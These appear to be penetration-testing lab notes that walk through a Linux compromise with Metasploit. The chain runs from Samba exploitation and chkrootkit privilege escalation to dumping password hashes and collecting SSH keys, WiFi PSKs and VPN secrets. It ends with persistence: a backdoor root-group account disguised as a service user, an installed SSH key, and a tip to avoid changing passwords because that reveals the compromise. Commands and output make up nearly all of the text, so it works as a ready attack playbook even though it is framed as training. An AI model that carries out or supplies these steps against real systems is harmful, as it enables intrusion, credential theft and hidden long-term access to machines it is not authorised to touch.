/bin/bash -i
whoami
# Enumerate Users
cat /etc/passwd
groups root
cat /etc/*issue
cat /etc/*release
uname -a
# Network Enumeration
netstat -antp
# if netstat is unavailable or returns nothing, use ss instead
ss -tnl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 *:445 *:*
LISTEN 0 4096 127.0.0.11:39389 *:*
LISTEN 0 50 *:139 *:*
LISTEN 0 50 :::445 :::*
LISTEN 0 50 :::139 :::*
# List processes
ps aux
# Enumerate environment variables
env
Some Post Exploitation
Enumerate application and service configuration files
exit
# if the session dies, open a new one
sessions -u 1
search enum_configs
use post/linux/gather/enum_configs
info
# Description:
# This module collects configuration files found on commonly installed
# applications and services, such as Apache, MySQL, Samba, Sendmail,
# etc. If a config file is found in its default path, the module will
# assume that is the file we want.
sessions
# Set the Meterpreter session
set SESSION 4
run
# It will not migrate if it's already an x64 process
loot
# Check the enumerated configuration files
Enumerate system environment variables
search env platform:linux
use post/multi/gather/env
info
# Description:
# This module prints out the operating system environment variables
sessions
set SESSION 3
run
Enumerate network information
search enum_network
use post/linux/gather/enum_network
info
# Description:
# This module gathers network information from the target system
# IPTables rules, interfaces, wireless information, open and listening
# ports, active network connections, DNS information and SSH
# information.
set SESSION 3
run
search enum_protections
use post/linux/gather/enum_protections
info
# Description:
# This module checks whether popular system hardening mechanisms are
# in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also
# tries to find installed applications that can be used to hinder,
# prevent, or detect attacks, such as tripwire, snort, and apparmor.
# This module is meant to identify Linux Secure Modules (LSM) in
# addition to various antivirus, IDS/IPS, firewalls, sandboxes and
# other security related software.
set SESSION 3
run
notes
# check the information gathered above, which is stored in the MSF database
Enumerate the system
search enum_system
use post/linux/gather/enum_system
info
# Description:
# This module gathers system information. We collect installed
# packages, installed services, mount information, user list, user
# bash history and cron jobs
set SESSION 3
run
loot
# Check the packages installed on the OS
cat /root/.msf4/loot/20230422105452_Linux_PostExp_192.215.55.3_linux.enum.syste_557868.txt
Check if the target is a VM or a container
search checkcontainer
use post/linux/gather/checkcontainer
# Description:
# This module attempts to determine whether the system is running
# inside of a container and if so, which one. This module supports
# detection of Docker, LXC, and systemd nspawn.
set SESSION 3
run
[+] This appears to be a 'Docker' container
📌 Depending on its configuration, a Docker container can be exploited to escape it and gain access to the host system.
Enumerate VM
search checkvm
use post/linux/gather/checkvm
set SESSION 3
run
# The target is not a VM
Enumerate users history
search enum_users_history
use post/linux/gather/enum_users_history
# Description:
# This module gathers the following user-specific information: shell
# history, MySQL history, PostgreSQL history, MongoDB history, Vim
# history, lastlog, and sudoers.
set SESSION 3
run
# If this doesn't work, migrate to a "NT AUTHORITY\SYSTEM" user service
loot
cat /root/.msf4/loot/20230422110345_Linux_PostExp_192.215.55.3_linux.enum.users_227379.txt
whoami
cat /etc/passwd
cat /etc/*issue
cat /etc/*release
uname -a
ip a s
netstat -antp
ss -tnl
ps aux
env
Background both the shell and the meterpreter session with CTRL+Z
Privilege Escalation
The technique depends on the target's Linux kernel version and distribution version.
It is necessary to manually enumerate a program vulnerable to privilege escalation — Chkrootkit v0.49 in this case.
search chkrootkit
use exploit/unix/local/chkrootkit
info
# Description:
# Chkrootkit before 0.50 will run any executable file named
# /tmp/update as root, allowing a trivial privilege escalation.
# WfsDelay is set to 24h, since this is how often a chkrootkit scan is
# scheduled by default.
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.15.244.2
sessions # check the used ports
run
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Exploitation
search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
options
run
pwd
/tmp
# CTRL + Z to background the shell
sessions
Upgrade the shell (cmd/unix) session to a Meterpreter session
sessions -u 1
sessions 2
getuid
Server username: uid=0, gid=0, euid=0, egid=0
# "root" user Meterpreter session
Linux user account hashes can be dumped from a session running as the privileged root user.
Terminate the shell session and background the Meterpreter session.
Hashdump
📌 Linux password hashes are stored in the /etc/shadow file, accessible only by a user with root privileges.
On modern Linux systems, the hashed passwords are stored in the /etc/shadow file; the password field in /etc/passwd then contains only the character x. /etc/passwd is readable by all users.
Linux user passwords are hashed with the crypt function. The hash follows a specific format: $id$salt$hashedpassword
The post/linux/gather/hashdump module needs to be run manually to dump the user account hashes and unshadow them.
A hash can be cracked (e.g. with John the Ripper) or stored for later use.
search hashdump
use post/linux/gather/hashdump
info
# Description:
# Post Module to dump the password hashes for all users on a Linux
# System
set SESSION 2
run
Some Post Exploitation
Enumerate ssh directories
search ssh_creds
use post/multi/gather/ssh_creds
info
# Description:
# This module will collect the contents of all users' .ssh directories
# on the targeted machine. Additionally, known_hosts and
# authorized_keys and any other files are also downloaded. This module
# is largely based on firefox_creds.rb.
sessions
# Set the Meterpreter session
set SESSION 2
run
Enumerate users' .ecrypts directories
search ecryptfs_creds
use post/linux/gather/ecryptfs_creds
info
# Description:
# This module will collect the contents of all users' .ecrypts
# directories on the targeted machine. Collected "wrapped-passphrase"
# files can be cracked with John the Ripper (JtR) to recover "mount
# passphrases".
sessions
set SESSION 2
run
Enumerate WiFi credentials
search enum_psk
use post/linux/gather/enum_psk
info
# Description:
# This module collects 802-11-Wireless-Security credentials such as
# Access-Point name and Pre-Shared-Key from your target CLIENT Linux
# machine using /etc/NetworkManager/system-connections/ files. The
# module gathers NetworkManager's plaintext "psk" information.
set SESSION 2
run
Check for PPTP VPN chap-secrets credentials
search pptpd_chap_secrets
use post/linux/gather/pptpd_chap_secrets
info
# Description:
# This module collects PPTP VPN information such as client, server,
# password, and IP from your target server's chap-secrets file.
set SESSION 2
run
Perform SSH Persistence
search sshkey
use post/linux/manage/sshkey_persistence
info
# Description:
# This module will add an SSH key to a specified user (or all), to
# allow remote login via SSH at any time.
set SESSION 2
run
search ssh_login
use auxiliary/scanner/ssh/ssh_login
options
set USERNAME jackie
set PASSWORD password
run
sessions
Upgrade the shell (cmd/unix) session to a Meterpreter session
sessions -u 1
Privilege Escalation
search chkrootkit
use exploit/unix/local/chkrootkit
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.101.97.2
run
# CTRL+Z to background the shell session
Upgrade the privileged session 3 to a Meterpreter session
sessions -u 3
sessions 4
Session 4 is now a privileged Meterpreter session
Persistence
Create a backdoor user with administrative privileges that can be used to access the target system via SSH
shell
whoami
root
cat /etc/passwd
# Create a user that looks like a service account
# and add it to "root group"
useradd -m ftp -s /bin/bash
passwd ftp
password123
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
ftp : ftp root
❗ Changing a user's password is a strong indicator of compromise; it should not be done.
Perform SSH persistence with a Metasploit persistence module
exit # CTRL+C
background
search platform:linux persistence
use post/linux/manage/sshkey_persistence
info
# Description:
# This module will add an SSH key to a specified user (or all), to
# allow remote login via SSH at any time.
set SESSION 4
set CREATESSHFOLDER true
run
Access the private key, copy the contents of the id_rsa file into a new file, and assign the file the appropriate permissions (e.g. chmod 600, since SSH rejects private keys readable by others).